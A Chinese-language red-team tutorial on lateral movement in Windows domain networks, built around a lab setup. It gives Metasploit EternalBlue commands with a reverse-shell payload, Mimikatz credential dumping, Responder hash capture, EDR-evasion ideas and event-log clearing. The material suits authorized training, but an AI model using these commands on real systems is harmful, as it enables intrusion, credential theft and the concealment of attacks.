0x01 攻击版图勾勒

当防御者开始为内网的安全构建复杂的壁垒时,作为红队,我们的目标是解构这些壁垒,寻找其中的薄弱点,实现横向移动的目的。横向移动的核心在于突破边界、获取凭证以及权限提升,从而在内网中自由穿梭。尤其在面对复杂的域环境时,我们更需要精准的攻击策略。

内网渗透的核心

内网环境与外网的不同之处在于,它常常被认为是一个相对安全的区域,防御措施可能更为宽松。而攻击者进入内网后,常常会利用其相对开放的环境,在不引起注意的情况下进行信息收集、凭证窃取及权限提升。这也正是横向移动技术的重要性所在。

在内网横向移动的过程中,我们会经历以下几个关键步骤:

  1. 信息收集:获取网络结构、域信息及可用的主机和服务。
  2. 漏洞利用:寻找并利用主机上的已知漏洞进入目标系统。
  3. 权限提升:在目标系统中提升权限,获取管理员级别的访问。
  4. 凭证窃取:获取其他用户的凭证,以便访问更多资源。
  5. 横向移动:利用获取的凭证和权限,在网络中进行横向移动。
  6. 痕迹清除:在攻击结束后,清除一切可能暴露攻击的痕迹。

黑客示意图

系統接管战术演练

环境搭建策略

在开始实际操作之前,我们需要搭建一个模拟的内网环境。这个环境应包括:

  • 一台域控制器,安装Active Directory服务
  • 多台Windows客户端,加入域
  • 配置常用的服务如文件共享、数据库等

本文将使用VirtualBox或VMware搭建虚拟网络,使用Kali Linux作为攻击机。

环境准备

  1. 安装域控制器
  • 使用Windows Server 2016或更高版本。
  • 配置Active Directory及DNS服务。
  • 创建多个用户及组策略,以模拟真实环境。
  1. 安装客户端
  • 使用Windows 10。
  • 加入到域中,确保与域控制器通信正常。
  1. Kali Linux攻击机
  • 安装常用渗透测试工具如Metasploit、Responder等。

网络配置

确保所有虚拟机在同一网络段中,模拟一个真实的内网环境。可以使用NAT或内部网络模式进行通信,并设置域控制器为网络的DNS服务器。

漏洞剖析与利用

在内网渗透中,攻击者常用的漏洞利用策略包括SMB协议的漏洞利用、弱口令攻击以及钓鱼攻击等。

利用SMB漏洞进行初步渗透

SMB(Server Message Block)协议被广泛用于文件和打印机共享,也是横向移动的一个重要途径。EternalBlue漏洞(CVE-2017-0144)是一个经典的SMB漏洞,虽然已经被修补,但仍存在于许多未更新的系统中。

EternalBlue攻击演示

<pre><code class="language-bash"># 在Kali上,使用Metasploit进行攻击 msfconsole

加载EternalBlue漏洞模块

use exploit/windows/smb/ms17_010_eternalblue

设置目标IP

set RHOST 192.168.1.10

设置payload

set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.5

执行攻击

exploit</code></pre>

此攻击成功后,会获取Meterpreter会话,后续可用于进一步攻击。

凭证的获取与利用

获取凭证是横向移动的关键。常用的方法包括Mimikatz抓取内存中的明文密码,以及利用LSASS进程获取hash。

黑客示意图

Mimikatz使用示例

<pre><code class="language-powershell"># 在Meterpreter会话中,上传Mimikatz upload /usr/share/windows-resources/mimikatz.exe C:\\Windows\\Temp\\mimikatz.exe

使用Powershell执行Mimikatz

powershell -c &quot;C:\\Windows\\Temp\\mimikatz.exe &#039;privilege::debug&#039; &#039;sekurlsa::logonpasswords&#039; exit&quot;</code></pre>

Mimikatz会将当前登录用户的凭证信息打印出来,包括明文密码和hash。

防御反推与绕过技巧

防守者通常会采取以下措施来抵御内网横向移动攻击:

  • 更新补丁:及时修补已知漏洞,尤其是高危漏洞如EternalBlue。
  • 监控与审计:部署EDR解决方案,如Microsoft Defender for Endpoint,监控异常活动。
  • 强认证措施:使用多因素认证及复杂密码策略。

为了绕过这些防御措施,攻击者需要利用社会工程学、利用零日漏洞或开发免杀的恶意载荷。

绕过EDR技术

  1. 恶意载荷免杀:使用C++或Go编写的自定义载荷,避免使用常见的Metasploit生成器。
  2. 内存注入技术:将恶意载荷注入到可信的进程中,如explorer.exe或svchost.exe。
  3. 流量混淆:通过加密或伪装流量的方式绕过网络流量监控。

流量捕获与分析

分析网络流量是内网渗透的重要环节。攻击者可以使用Responder工具捕获网络流量中的明文信息及Hash,进一步用于身份验证的攻击。

Responder使用示例

黑客示意图

<pre><code class="language-bash"># 启动Responder进行NetBIOS、LLMNR协议流量捕获 responder -I eth0 -rdw

分析捕获的流量,并提取Hash

cat /usr/share/responder/logs/Responder-Session.log</code></pre>

通过分析这些流量,我们可以获取到用户的凭证散列值(如NTLM Hash),用于后续攻击。

黑客示意图

余波处理与痕迹清除

在完成攻击后,我们需要确保没有痕迹留存,以免被防御者追踪。

清除日志与痕迹

  1. Windows事件日志清除:使用wevtutil工具删除特定事件日志。
  2. 临时文件清除:删除攻击过程中上传或生成的文件。
  3. 进程与服务清理:终止或隐藏恶意进程,并清除注册表中可能的持久化条目。

攻防经验的私享

在多年的红队工作中,以下经验值得分享:

  • 定制化攻击策略:每一个内网环境都是不同的,攻击者需要灵活调整策略。
  • 信息收集的重要性:全面的信息收集往往是成功攻击的关键。
  • 对抗思维:时刻模拟防御者的思维,提前预知可能的防御措施。
  • 持续学习与更新:安全领域变化迅速,保持对新技术的敏锐嗅觉。

合法声明:本文仅供授权安全测试及安全研究人员学习之用,任何未授权的攻击行为均属非法。